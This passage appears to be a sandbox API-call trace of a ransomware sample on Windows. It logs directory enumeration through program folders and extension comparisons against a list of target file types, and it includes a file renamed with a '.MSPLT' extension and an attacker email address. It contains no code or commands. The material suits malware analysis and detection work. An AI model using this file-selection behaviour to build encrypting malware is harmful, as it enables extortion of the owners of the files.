ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0288.019] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.019] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0288.020] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0288.020] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0288.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.021] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0288.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.021] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msadc", cAlternateFileName="")) returned 1 [0288.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0288.021] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0288.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.022] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0288.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0288.022] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0288.023] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.023] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0288.023] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.023] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4426d40, ftCreationTime.dwHighDateTime=0x1d584c5, ftLastAccessTime.dwLowDateTime=0x5408d750, ftLastAccessTime.dwHighDateTime=0x1d59267, ftLastWriteTime.dwLowDateTime=0x5408d750, ftLastWriteTime.dwHighDateTime=0x1d59267, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="trillian.exe", cAlternateFileName="")) returned 1 [0288.023] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0288.024] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d2666f8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x240000, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 1 [0288.025] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.025] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0288.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.026] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec4f8a0, ftCreationTime.dwHighDateTime=0x1d59c3a, ftLastAccessTime.dwLowDateTime=0x1bbea800, ftLastAccessTime.dwHighDateTime=0x1d5be92, ftLastWriteTime.dwLowDateTime=0x1bbea800, ftLastWriteTime.dwHighDateTime=0x1d5be92, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="leechftp.exe", cAlternateFileName="")) returned 1 [0288.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.026] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0288.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0288.026] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xea796993, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea796993, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Java", cAlternateFileName="")) returned 1 [0288.370] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.370] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0288.403] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.403] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0288.404] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.404] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0288.405] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.405] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0288.406] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.406] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0288.406] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.406] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0288.406] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.407] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0288.409] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.409] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0288.415] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.415] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0288.419] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.419] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0288.425] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0288.425] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 0 [0288.425] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0288.426] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.426] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0288.621] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.621] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0288.626] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.626] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0288.646] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.646] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0288.646] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.646] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0288.647] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.650] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5896b9f0, ftCreationTime.dwHighDateTime=0x1d5acec, ftLastAccessTime.dwLowDateTime=0x13ae3ae0, ftLastAccessTime.dwHighDateTime=0x1d5c626, ftLastWriteTime.dwLowDateTime=0x13ae3ae0, ftLastWriteTime.dwHighDateTime=0x1d5c626, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="modules_recommend.exe", cAlternateFileName="MODULE~1.EXE")) returned 1 [0288.650] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0288.650] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5dc3c3a3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5dc3c3a3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0288.655] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.655] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x62a8d554, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x62a8d554, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0288.672] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0288.672] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0288.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0288.696] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0289.101] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x401cd60, Size=0x4000) returned 0x4014d58 [0289.102] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BD08808_.WMF", cAlternateFileName="")) returned 1 [0289.102] lstrlenW (lpString="BD08808_.WMF") returned 12 [0289.102] lstrlenW (lpString=".1cd") returned 4 [0289.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0289.103] lstrlenW (lpString=".3ds") returned 4 [0289.103] lstrcmpiW (lpString1=".3ds", lpString2=".WMF") returned -1 [0289.103] lstrlenW (lpString=".3fr") returned 4 [0289.103] lstrcmpiW (lpString1=".3fr", lpString2=".WMF") returned -1 [0289.103] lstrlenW (lpString=".3g2") returned 4 [0289.103] lstrcmpiW (lpString1=".3g2", lpString2=".WMF") returned -1 [0289.103] lstrlenW (lpString=".3gp") returned 4 [0289.103] lstrcmpiW (lpString1=".3gp", lpString2=".WMF") returned -1 [0289.103] lstrlenW (lpString=".7z") returned 3 [0289.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0289.103] lstrlenW (lpString=".accda") returned 6 [0289.103] lstrcmpiW (lpString1=".accda", lpString2="8_.WMF") returned -1 [0289.103] lstrlenW (lpString=".accdb") returned 6 [0289.103] lstrcmpiW (lpString1=".accdb", lpString2="8_.WMF") returned -1 [0289.103] lstrlenW (lpString=".accdc") returned 6 [0289.103] lstrcmpiW (lpString1=".accdc", lpString2="8_.WMF") returned -1 [0289.103] lstrlenW (lpString=".accde") returned 6 [0289.103] lstrcmpiW (lpString1=".accde", lpString2="8_.WMF") returned -1 [0289.104] lstrlenW (lpString=".accdt") returned 6 [0289.104] lstrcmpiW (lpString1=".accdt", lpString2="8_.WMF") returned -1 [0289.104] lstrlenW (lpString=".accdw") returned 6 [0289.104] lstrcmpiW (lpString1=".accdw", lpString2="8_.WMF") returned -1 [0289.104] 